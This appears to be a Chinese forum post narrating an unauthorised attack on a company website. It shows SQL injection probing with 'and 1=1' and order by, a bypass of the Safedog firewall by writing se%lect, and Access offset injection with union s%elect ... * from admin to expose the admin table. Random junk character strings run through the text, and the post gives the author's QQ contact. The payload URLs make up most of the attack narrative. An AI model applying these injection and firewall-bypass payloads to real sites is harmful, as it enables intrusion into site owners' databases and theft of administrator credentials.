打开网站,一个企业站。
2 w; i1 D9 C* }* S4 V. X- j; ]' S- y4 ]
6 i. I7 [2 R& x( f# Q. {) _; c顺手加个admin \2 D# C3 C+ c2 J
1 h& h" k2 J9 L2 N: w2 D$ X D1 V9 k! U" ]6 v6 `! A% q
默认后台。. f& T! D2 f6 b f" Q7 p
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。) z T# E+ [" b6 _% K+ u0 s
+ d% a1 p* x+ Y
( @% Q9 s \. i
1 i, v: o: q" n( J% x所以就不用御剑扫了,待会直接封IP。
- i) T6 [0 P- p. `+ b3 {# m ! \" t- m' g0 x0 W# c; }, p+ \
用order by语句判断是否存在注入。
( A4 T/ ?6 C1 W `; h( c# S( Nhttp://www.xxx.com /product_show.asp?id=997 order by 1; l" g- ~8 y1 ^, S/ @- W
http://www.xxx.com /product_show.asp?id=997 order by 100
7 r/ K; {8 A7 ^ c1 H3 w现在存在注入,经测试后发现是9个字段。
p! y# f. V& Z2 p0 f m
* A5 U% p; B, Z1 _7 K. X接下来进行联合查询,猜是否存在admin表。" D F3 A- T& p1 n# G
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。6 j; }8 d+ L0 U: k
* @6 d" g l0 d! s Z
1 ]' J, K3 H5 e8 j9 G
* ]. c7 O' V- b; R& m0 j' ~' P _在select中间加个%,se%lect绕过安全狗。+ g& ?9 p6 z8 ^$ j' M) N
7 t, ~4 p% Q8 [1 _9 `* D
: E! L/ N T2 L s3 V发现存在admin表,然后开始手工猜常用的字段。
; n- `; ^' Y7 D纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。2 _6 ^# X2 e& @( E. h) f0 q
0 v/ I& d; U: J( u8 R0 T# T/ Z/ i! w突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。4 w4 x6 ^- r* F( e+ f! [
/ a; T& T) ]) N科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。5 |! B* @ Q0 Z! f/ R
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin! N8 R: p {8 c# T0 i$ T
好了,敏感内容出显了。( I6 K% U- z0 G# q
; M5 O3 v( L- ]. N
& _ E* v/ e3 |
# P3 V1 q6 i8 o" `# | |